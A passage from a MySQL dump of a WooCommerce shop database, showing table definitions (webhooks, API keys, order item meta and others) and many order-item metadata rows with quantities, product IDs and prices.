  `topic` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_created_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `api_version` smallint(4) NOT NULL,
  `failure_count` smallint(10) NOT NULL DEFAULT '0',
  `pending_delivery` tinyint(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`webhook_id`),
  KEY `user_id` (`user_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_webhooks`
--

LOCK TABLES `wp_wc_webhooks` WRITE;
/*!40000 ALTER TABLE `wp_wc_webhooks` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_webhooks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_api_keys`
--

DROP TABLE IF EXISTS `wp_woocommerce_api_keys`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_woocommerce_api_keys` (
  `key_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `description` varchar(200) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `permissions` varchar(10) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `consumer_key` char(64) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `consumer_secret` char(43) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `nonces` longtext COLLATE utf8mb4_unicode_520_ci,
  `truncated_key` char(7) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `last_access` datetime DEFAULT NULL,
  PRIMARY KEY (`key_id`),
  KEY `consumer_key` (`consumer_key`),
  KEY `consumer_secret` (`consumer_secret`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_api_keys`
--

LOCK TABLES `wp_woocommerce_api_keys` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_api_keys` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_woocommerce_api_keys` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_attribute_taxonomies`
--

DROP TABLE IF EXISTS `wp_woocommerce_attribute_taxonomies`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_woocommerce_attribute_taxonomies` (
  `attribute_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `attribute_name` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `attribute_label` varchar(200) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `attribute_type` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `attribute_orderby` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `attribute_public` int(1) NOT NULL DEFAULT '1',
  PRIMARY KEY (`attribute_id`),
  KEY `attribute_name` (`attribute_name`(191))
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_attribute_taxonomies`
--

LOCK TABLES `wp_woocommerce_attribute_taxonomies` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_attribute_taxonomies` DISABLE KEYS */;
INSERT INTO `wp_woocommerce_attribute_taxonomies` VALUES (1,'numero-coperti','Numero Persone','text','menu_order',0);
/*!40000 ALTER TABLE `wp_woocommerce_attribute_taxonomies` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_downloadable_product_permissions`
--

DROP TABLE IF EXISTS `wp_woocommerce_downloadable_product_permissions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_woocommerce_downloadable_product_permissions` (
  `permission_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `download_id` varchar(36) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `product_id` bigint(20) unsigned NOT NULL,
  `order_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `order_key` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `user_email` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `user_id` bigint(20) unsigned DEFAULT NULL,
  `downloads_remaining` varchar(9) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `access_granted` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `access_expires` datetime DEFAULT NULL,
  `download_count` bigint(20) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`permission_id`),
  KEY `download_order_key_product` (`product_id`,`order_id`,`order_key`(191),`download_id`),
  KEY `download_order_product` (`download_id`,`order_id`,`product_id`),
  KEY `order_id` (`order_id`),
  KEY `user_order_remaining_expires` (`user_id`,`order_id`,`downloads_remaining`,`access_expires`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_downloadable_product_permissions`
--

LOCK TABLES `wp_woocommerce_downloadable_product_permissions` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_downloadable_product_permissions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_woocommerce_downloadable_product_permissions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_gift_coupon`
--

DROP TABLE IF EXISTS `wp_woocommerce_gift_coupon`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_woocommerce_gift_coupon` (
  `id_user` bigint(20) unsigned NOT NULL,
  `id_coupon` bigint(20) unsigned NOT NULL,
  `id_order` bigint(20) NOT NULL,
  KEY `woocomerce_key_user_generate_coupons` (`id_user`),
  KEY `woocomerce_key_coupon_generate_coupons` (`id_coupon`),
  KEY `woocomerce_key_order_generate_coupons` (`id_order`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_gift_coupon`
--

LOCK TABLES `wp_woocommerce_gift_coupon` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_gift_coupon` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_woocommerce_gift_coupon` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_log`
--

DROP TABLE IF EXISTS `wp_woocommerce_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_woocommerce_log` (
  `log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `timestamp` datetime NOT NULL,
  `level` smallint(4) NOT NULL,
  `source` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `message` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `context` longtext COLLATE utf8mb4_unicode_520_ci,
  PRIMARY KEY (`log_id`),
  KEY `level` (`level`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_log`
--

LOCK TABLES `wp_woocommerce_log` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_woocommerce_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_order_itemmeta`
--

DROP TABLE IF EXISTS `wp_woocommerce_order_itemmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_woocommerce_order_itemmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `order_item_id` bigint(20) unsigned NOT NULL,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_520_ci,
  PRIMARY KEY (`meta_id`),
  KEY `order_item_id` (`order_item_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=3960 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_order_itemmeta`
--

LOCK TABLES `wp_woocommerce_order_itemmeta` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_order_itemmeta` DISABLE KEYS */;
INSERT INTO `wp_woocommerce_order_itemmeta` VALUES (1,1,'_qty','1'),(2,1,'_tax_class',''),(3,1,'_product_id','217'),(4,1,'_variation_id','0'),(5,1,'_line_subtotal','0.01'),(6,1,'_line_total','0.01'),(7,1,'_line_subtotal_tax','0'),(8,1,'_line_tax','0'),(9,1,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(10,2,'_qty','1'),(11,2,'_tax_class',''),(12,2,'_product_id','217'),(13,2,'_variation_id','0'),(14,2,'_line_subtotal','0.01'),(15,2,'_line_total','0.01'),(16,2,'_line_subtotal_tax','0'),(17,2,'_line_tax','0'),(18,2,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(19,3,'_qty','1'),(20,3,'_tax_class',''),(21,3,'_product_id','211'),(22,3,'_variation_id','0'),(23,3,'_line_subtotal','60'),(24,3,'_line_total','60'),(25,3,'_line_subtotal_tax','0'),(26,3,'_line_tax','0'),(27,3,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(28,4,'_qty','1'),(29,4,'_tax_class',''),(30,4,'_product_id','211'),(31,4,'_variation_id','0'),(32,4,'_line_subtotal','60'),(33,4,'_line_total','60'),(34,4,'_line_subtotal_tax','0'),(35,4,'_line_tax','0'),(36,4,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(37,5,'_qty','1'),(38,5,'_tax_class',''),(39,5,'_product_id','211'),(40,5,'_variation_id','0'),(41,5,'_line_subtotal','60'),(42,5,'_line_total','60'),(43,5,'_line_subtotal_tax','0'),(44,5,'_line_tax','0'),(45,5,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(46,6,'_qty','1'),(47,6,'_tax_class',''),(48,6,'_product_id','211'),(49,6,'_variation_id','0'),(50,6,'_line_subtotal','60'),(51,6,'_line_total','60'),(52,6,'_line_subtotal_tax','0'),(53,6,'_line_tax','0'),(54,6,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(55,7,'_qty','1'),(56,7,'_tax_class',''),(57,7,'_product_id','220'),(58,7,'_variation_id','0'),(59,7,'_line_subtotal','180'),(60,7,'_line_total','180'),(61,7,'_line_subtotal_tax','0'),(62,7,'_line_tax','0'),(63,7,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(64,8,'_qty','2'),(65,8,'_tax_class',''),(66,8,'_product_id','211'),(67,8,'_variation_id','0'),(68,8,'_line_subtotal','120'),(69,8,'_line_total','120'),(70,8,'_line_subtotal_tax','0'),(71,8,'_line_tax','0'),(72,8,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(73,9,'_qty','2'),(74,9,'_tax_class',''),(75,9,'_product_id','211'),(76,9,'_variation_id','0'),(77,9,'_line_subtotal','120'),(78,9,'_line_total','120'),(79,9,'_line_subtotal_tax','0'),(80,9,'_line_tax','0'),(81,9,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(82,10,'_qty','1'),(83,10,'_tax_class',''),(84,10,'_product_id','211'),(85,10,'_variation_id','0'),(86,10,'_line_subtotal','60'),(87,10,'_line_total','60'),(88,10,'_line_subtotal_tax','0'),(89,10,'_line_tax','0'),(90,10,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(91,11,'_qty','1'),(92,11,'_tax_class',''),(93,11,'_product_id','211'),(94,11,'_variation_id','0'),(95,11,'_line_subtotal','60'),(96,11,'_line_total','60'),(97,11,'_line_subtotal_tax','0'),(98,11,'_line_tax','0'),(99,11,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(100,12,'_qty','1'),(101,12,'_tax_class',''),(102,12,'_product_id','220'),(103,12,'_variation_id','0'),(104,12,'_line_subtotal','180'),(105,12,'_line_total','180'),(106,12,'_line_subtotal_tax','0'),(107,12,'_line_tax','0'),(108,12,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(109,13,'_qty','1'),(110,13,'_tax_class',''),(111,13,'_product_id','216'),(112,13,'_variation_id','0'),(113,13,'_line_subtotal','120'),(114,13,'_line_total','120'),(115,13,'_line_subtotal_tax','0'),(116,13,'_line_tax','0'),(117,13,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(118,14,'_qty','1'),(119,14,'_tax_class',''),(120,14,'_product_id','211'),(121,14,'_variation_id','0'),(122,14,'_line_subtotal','60'),(123,14,'_line_total','60'),(124,14,'_line_subtotal_tax','0'),(125,14,'_line_tax','0'),(126,14,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(127,15,'_qty','1'),(128,15,'_tax_class',''),(129,15,'_product_id','211'),(130,15,'_variation_id','0'),(131,15,'_line_subtotal','60'),(132,15,'_line_total','60'),(133,15,'_line_subtotal_tax','0'),(134,15,'_line_tax','0'),(135,15,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(136,16,'_qty','1'),(137,16,'_tax_class',''),(138,16,'_product_id','216'),(139,16,'_variation_id','0'),(140,16,'_line_subtotal','120'),(141,16,'_line_total','120'),(142,16,'_line_subtotal_tax','0'),(143,16,'_line_tax','0'),(144,16,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(145,17,'_qty','1'),(146,17,'_tax_class',''),(147,17,'_product_id','220'),(148,17,'_variation_id','0'),(149,17,'_line_subtotal','180'),(150,17,'_line_total','180'),(151,17,'_line_subtotal_tax','0'),(152,17,'_line_tax','0'),(153,17,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(154,18,'_qty','1'),(155,18,'_tax_class',''),(156,18,'_product_id','213'),(157,18,'_variation_id','0'),(158,18,'_line_subtotal','90'),(159,18,'_line_total','90'),(160,18,'_line_subtotal_tax','0'),(161,18,'_line_tax','0'),(162,18,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(163,19,'_qty','1'),(164,19,'_tax_class',''),(165,19,'_product_id','211'),(166,19,'_variation_id','0'),(167,19,'_line_subtotal','60'),(168,19,'_line_total','60'),(169,19,'_line_subtotal_tax','0'),(170,19,'_line_tax','0'),(171,19,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(172,20,'_qty','1'),(173,20,'_tax_class',''),(174,20,'_product_id','216'),(175,20,'_variation_id','0'),(176,20,'_line_subtotal','120'),(177,20,'_line_total','120'),(178,20,'_line_subtotal_tax','0'),(179,20,'_line_tax','0'),(180,20,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(181,21,'_qty','1'),(182,21,'_tax_class',''),(183,21,'_product_id','211'),(184,21,'_variation_id','0'),(185,21,'_line_subtotal','60'),(186,21,'_line_total','60'),(187,21,'_line_subtotal_tax','0'),(188,21,'_line_tax','0'),(189,21,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(190,22,'_qty','1'),(191,22,'_tax_class',''),(192,22,'_product_id','211'),(193,22,'_variation_id','0'),(194,22,'_line_subtotal','60'),(195,22,'_line_total','60'),(196,22,'_line_subtotal_tax','0'),(197,22,'_line_tax','0'),(198,22,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(199,23,'_qty','1'),(200,23,'_tax_class',''),(201,23,'_product_id','244'),(202,23,'_variation_id','0'),(203,23,'_line_subtotal','150'),(204,23,'_line_total','150'),(205,23,'_line_subtotal_tax','0'),(206,23,'_line_tax','0'),(207,23,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(208,24,'_qty','1'),(209,24,'_tax_class',''),(210,24,'_product_id','211'),(211,24,'_variation_id','0'),(212,24,'_line_subtotal','60'),(213,24,'_line_total','60'),(214,24,'_line_subtotal_tax','0'),(215,24,'_line_tax','0'),(216,24,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(217,25,'_qty','1'),(218,25,'_tax_class',''),(219,25,'_product_id','211'),(220,25,'_variation_id','0'),(221,25,'_line_subtotal','60'),(222,25,'_line_total','60'),(223,25,'_line_subtotal_tax','0'),(224,25,'_line_tax','0'),(225,25,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(226,26,'_qty','1'),(227,26,'_tax_class',''),(228,26,'_product_id','216'),(229,26,'_variation_id','0'),(230,26,'_line_subtotal','120'),(231,26,'_line_total','120'),(232,26,'_line_subtotal_tax','0'),(233,26,'_line_tax','0'),(234,26,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(235,27,'_qty','1'),(236,27,'_tax_class',''),(237,27,'_product_id','244'),(238,27,'_variation_id','0'),(239,27,'_line_subtotal','150'),(240,27,'_line_total','150'),(241,27,'_line_subtotal_tax','0'),(242,27,'_line_tax','0'),(243,27,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(262,30,'_qty','1'),(263,30,'_tax_class',''),(264,30,'_product_id','216'),(265,30,'_variation_id','0'),(266,30,'_line_subtotal','120'),(267,30,'_line_total','120'),(268,30,'_line_subtotal_tax','0'),(269,30,'_line_tax','0'),(270,30,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(271,31,'_qty','1'),(272,31,'_tax_class',''),(273,31,'_product_id','288'),(274,31,'_variation_id','0'),(275,31,'_line_subtotal','30'),(276,31,'_line_total','30'),(277,31,'_line_subtotal_tax','0'),(278,31,'_line_tax','0'),(279,31,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(280,32,'_qty','1'),(281,32,'_tax_class',''),(282,32,'_product_id','288'),(283,32,'_variation_id','0'),(284,32,'_line_subtotal','30'),(285,32,'_line_total','30'),(286,32,'_line_subtotal_tax','0'),(287,32,'_line_tax','0'),(288,32,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(289,33,'_qty','1'),(290,33,'_tax_class',''),(291,33,'_product_id','288'),(292,33,'_variation_id','0'),(293,33,'_line_subtotal','30'),(294,33,'_line_total','30'),(295,33,'_line_subtotal_tax','0'),(296,33,'_line_tax','0'),(297,33,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(298,34,'_qty','1'),(299,34,'_tax_class',''),(300,34,'_product_id','288'),(301,34,'_variation_id','0'),(302,34,'_line_subtotal','30'),(303,34,'_line_total','30'),(304,34,'_line_subtotal_tax','0'),(305,34,'_line_tax','0'),(306,34,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(307,35,'_qty','1'),(308,35,'_tax_class',''),(309,35,'_product_id','288'),(310,35,'_variation_id','0'),(311,35,'_line_subtotal','30'),(312,35,'_line_total','30'),(313,35,'_line_subtotal_tax','0'),(314,35,'_line_tax','0'),(315,35,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(316,36,'_qty','1'),(317,36,'_tax_class',''),(318,36,'_product_id','288'),(319,36,'_variation_id','0'),(320,36,'_line_subtotal','30'),(321,36,'_line_total','30'),(322,36,'_line_subtotal_tax','0'),(323,36,'_line_tax','0'),(324,36,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(325,37,'_qty','1'),(326,37,'_tax_class',''),(327,37,'_product_id','288'),(328,37,'_variation_id','0'),(329,37,'_line_subtotal','30'),(330,37,'_line_total','30'),(331,37,'_line_subtotal_tax','0'),(332,37,'_line_tax','0'),(333,37,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(334,38,'_qty','1'),(335,38,'_tax_class',''),(336,38,'_product_id','288'),(337,38,'_variation_id','0'),(338,38,'_line_subtotal','30'),(339,38,'_line_total','30'),(340,38,'_line_subtotal_tax','0'),(341,38,'_line_tax','0'),(342,38,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(343,39,'_qty','1'),(344,39,'_tax_class',''),(345,39,'_product_id','288'),(346,39,'_variation_id','0'),(347,39,'_line_subtotal','30'),(348,39,'_line_total','30'),(349,39,'_line_subtotal_tax','0'),(350,39,'_line_tax','0'),(351,39,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(352,40,'_qty','1'),(353,40,'_tax_class',''),(354,40,'_product_id','288'),(355,40,'_variation_id','0'),(356,40,'_line_subtotal','30'),(357,40,'_line_total','30'),(358,40,'_line_subtotal_tax','0'),(359,40,'_line_tax','0'),(360,40,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(361,41,'_qty','1'),(362,41,'_tax_class',''),(363,41,'_product_id','288'),(364,41,'_variation_id','0'),(365,41,'_line_subtotal','30'),(366,41,'_line_total','30'),(367,41,'_line_subtotal_tax','0'),(368,41,'_line_tax','0'),(369,41,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(370,42,'_qty','1'),(371,42,'_tax_class',''),(372,42,'_product_id','288'),(373,42,'_variation_id','0'),(374,42,'_line_subtotal','30'),(375,42,'_line_total','30'),(376,42,'_line_subtotal_tax','0'),(377,42,'_line_tax','0'),(378,42,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(379,43,'_qty','1'),(380,43,'_tax_class',''),(381,43,'_product_id','288'),(382,43,'_variation_id','0'),(383,43,'_line_subtotal','30'),(384,43,'_line_total','30'),(385,43,'_line_subtotal_tax','0'),(386,43,'_line_tax','0'),(387,43,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(388,44,'_qty','1'),(389,44,'_tax_class',''),(390,44,'_product_id','288'),(391,44,'_variation_id','0'),(392,44,'_line_subtotal','30'),(393,44,'_line_total','30'),(394,44,'_line_subtotal_tax','0'),(395,44,'_line_tax','0'),(396,44,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(397,45,'_qty','1'),(398,45,'_tax_class',''),(399,45,'_product_id','288'),(400,45,'_variation_id','0'),(401,45,'_line_subtotal','30'),(402,45,'_line_total','30'),(403,45,'_line_subtotal_tax','0'),(404,45,'_line_tax','0'),(405,45,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(415,47,'_qty','1'),(416,47,'_tax_class',''),(417,47,'_product_id','290'),(418,47,'_variation_id','0'),(419,47,'_line_subtotal','60'),(420,47,'_line_total','60'),(421,47,'_line_subtotal_tax','0'),(422,47,'_line_tax','0'),(423,47,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(424,48,'_qty','1'),(425,48,'_tax_class',''),(426,48,'_product_id','290'),(427,48,'_variation_id','0'),(428,48,'_line_subtotal','60'),(429,48,'_line_total','60'),(430,48,'_line_subtotal_tax','0'),(431,48,'_line_tax','0'),(432,48,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(433,49,'_qty','1'),(434,49,'_tax_class',''),(435,49,'_product_id','288'),(436,49,'_variation_id','0'),(437,49,'_line_subtotal','30'),(438,49,'_line_total','30'),(439,49,'_line_subtotal_tax','0'),(440,49,'_line_tax','0'),(441,49,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(442,50,'_qty','1'),(443,50,'_tax_class',''),(444,50,'_product_id','288'),(445,50,'_variation_id','0'),(446,50,'_line_subtotal','30'),(447,50,'_line_total','30'),(448,50,'_line_subtotal_tax','0'),(449,50,'_line_tax','0'),(450,50,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(460,52,'_qty','1'),(461,52,'_tax_class',''),(462,52,'_product_id','288'),(463,52,'_variation_id','0'),(464,52,'_line_subtotal','30'),(465,52,'_line_total','30'),(466,52,'_line_subtotal_tax','0'),(467,52,'_line_tax','0'),(468,52,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(469,53,'_qty','1'),(470,53,'_tax_class',''),(471,53,'_product_id','288'),(472,53,'_variation_id','0'),(473,53,'_line_subtotal','30'),(474,53,'_line_total','30'),(475,53,'_line_subtotal_tax','0'),(476,53,'_line_tax','0'),(477,53,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(478,54,'_qty','1'),(479,54,'_tax_class',''),(480,54,'_product_id','327'),(481,54,'_variation_id','0'),(482,54,'_line_subtotal','50'),(483,54,'_line_total','50'),(484,54,'_line_subtotal_tax','0'),(485,54,'_line_tax','0'),(486,54,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(496,56,'_qty','1'),(497,56,'_tax_class',''),(498,56,'_product_id','327'),(499,56,'_variation_id','0'),(500,56,'_line_subtotal','50'),(501,56,'_line_total','50'),(502,56,'_line_subtotal_tax','0'),(503,56,'_line_tax','0'),(504,56,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(505,57,'_qty','1'),(506,57,'_tax_class',''),(507,57,'_product_id','323'),(508,57,'_variation_id','0'),(509,57,'_line_subtotal','75'),(510,57,'_line_total','75'),(511,57,'_line_subtotal_tax','0'),(512,57,'_line_tax','0'),(513,57,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(514,58,'_qty','1'),(515,58,'_tax_class',''),(516,58,'_product_id','322'),(517,58,'_variation_id','0'),(518,58,'_line_subtotal','50'),(519,58,'_line_total','50'),(520,58,'_line_subtotal_tax','0'),(521,58,'_line_tax','0'),(522,58,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(523,59,'_qty','1'),(524,59,'_tax_class',''),(525,59,'_product_id','324'),(526,59,'_variation_id','0'),(527,59,'_line_subtotal','100'),(528,59,'_line_total','100'),(529,59,'_line_subtotal_tax','0'),(530,59,'_line_tax','0'),(531,59,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(532,60,'_qty','1'),(533,60,'_tax_class',''),(534,60,'_product_id','327'),(535,60,'_variation_id','0'),(536,60,'_line_subtotal','50'),(537,60,'_line_total','50'),(538,60,'_line_subtotal_tax','0'),(539,60,'_line_tax','0'),(540,60,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(541,61,'_qty','1'),(542,61,'_tax_class',''),(543,61,'_product_id','324'),(544,61,'_variation_id','0'),(545,61,'_line_subtotal','100'),(546,61,'_line_total','100'),(547,61,'_line_subtotal_tax','0'),(548,61,'_line_tax','0'),(549,61,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(550,62,'_qty','1'),(551,62,'_tax_class',''),(552,62,'_product_id','323'),(553,62,'_variation_id','0'),(554,62,'_line_subtotal','75'),(555,62,'_line_total','75'),(556,62,'_line_subtotal_tax','0'),(557,62,'_line_tax','0'),(558,62,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(559,63,'_qty','1'),(560,63,'_tax_class',''),(561,63,'_product_id','322'),(562,63,'_variation_id','0'),(563,63,'_line_subtotal','50'),(564,63,'_line_total','50'),(565,63,'_line_subtotal_tax','0'),(566,63,'_line_tax','0'),(567,63,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(568,64,'_qty','1'),(569,64,'_tax_class',''),(570,64,'_product_id','327'),(571,64,'_variation_id','0'),(572,64,'_line_subtotal','50'),(573,64,'_line_total','50'),(574,64,'_line_subtotal_tax','0'),(575,64,'_line_tax','0'),(576,64,'_line_t